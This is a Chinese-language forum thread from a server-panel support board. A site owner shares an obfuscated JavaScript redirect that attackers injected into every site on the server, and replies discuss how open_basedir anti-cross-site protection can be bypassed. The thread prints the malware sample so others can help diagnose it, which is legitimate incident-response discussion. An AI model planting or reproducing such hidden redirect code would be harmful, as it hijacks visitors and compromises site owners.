宝塔51特惠活动,企业版1099元/年,送SSL证书,最高立减2万元!查看活动
当前位置:论坛首页 > Linux面板 > 讨论

【已解答】设置了防跨站无效,网站被人植入木马,跳转...

发表在 Linux面板2025-2-23 17:48 [复制链接] 5 601

网站被人偷偷植入了下面的木马,偷偷24小时跳转一次到黑产。
  1. (function(){
  2.     var _0xa1b2 = "#黑产网屏蔽了#"; //
  3.     var _0xc3d4 = "cmVkaXJlY3RlZA=="; //
  4.     var _0xd5e6 = "MjQ="; // 24小时

  5.     function _0xf7g8(_0x9h0i){ return atob(_0x9h0i); } //
  6.     function _0xj1k2(_0xl3m, _0xn4o){
  7.         var _0xp5q = new Date();
  8.         _0xp5q.setTime(_0xp5q.getTime() + (_0xn4o * 60 * 60 * 1000));
  9.         document.cookie = _0xl3m + "=1;expires=" + _0xp5q.toUTCString() + ";path=/";
  10.     }
  11.     function _0xr6s(_0xt7u){
  12.         var _0xv8w = document.cookie.match(new RegExp("(^| )" + _0xt7u + "=([^;]+)"));
  13.         return _0xv8w ? _0xv8w[2] : null;
  14.     }

  15.     window.addEventListener("load", function() {
  16.         var _0xurl = _0xf7g8(_0xa1b2);
  17.         var _0xcookie = _0xf7g8(_0xc3d4);
  18.         var _0xexpire = parseInt(_0xf7g8(_0xd5e6));
  19.         
  20.         if (!_0xr6s(_0xcookie)) {
  21.             _0xj1k2(_0xcookie, _0xexpire);
  22.             eval("window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'] = _0xurl;");
  23.         }
  24.     });
  25. })();
复制代码
宝塔面板里设置了open_basedir防止跨站攻击。这样说,webshell如果只修改了一个站,不可能所有站都能修改吧。但是现在所有网站都被修改了。
检查了Linux和SSL登录记录,没有异常登录,FTP也没有异常。难道是
宝塔面板的防止跨站攻击设置无效?
使用道具 举报 只看该作者 回复
发表于 2025-2-23 19:45:33 | 显示全部楼层
我的也一样,哎,,,都没有管的。
使用道具 举报 回复 支持 反对
发表于 2025-2-23 21:04:34 | 显示全部楼层
本帖最后由 邓振华 于 2025-2-23 22:04 编辑

黑客通过六零导航源码的漏洞控制了一个网站,后面整个服务器的其他网站都被植入了代码。我点开了每个网站检查,全部都勾选了open_basedir防止跨站攻击。难道是宝塔面板的防止跨站攻击设置无效?
使用道具 举报 回复 支持 反对
发表于 2025-2-23 21:52:40 | 显示全部楼层
防跨站的设置肯定是有效的。
宝塔通过open_basedir 进行设置的防跨站。
但是开启了open_basedir 并不代表百分之百不能跨站。
你可以百度搜索一下。open_basedir 绕过  这种基础的配置是存在绕过的
使用道具 举报 回复 支持 反对
发表于 2025-2-23 22:14:50 | 显示全部楼层
宝塔技术-小强 发表于 2025-2-23 21:52
防跨站的设置肯定是有效的。
宝塔通过open_basedir 进行设置的防跨站。
但是开启了open_basedir 并不代表百 ...

有没有其他更好的方法防止跨站攻击?
使用道具 举报 回复 支持 反对
发表于 2025-2-24 17:25:34 | 显示全部楼层
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析
快速回复 返回顶部 返回列表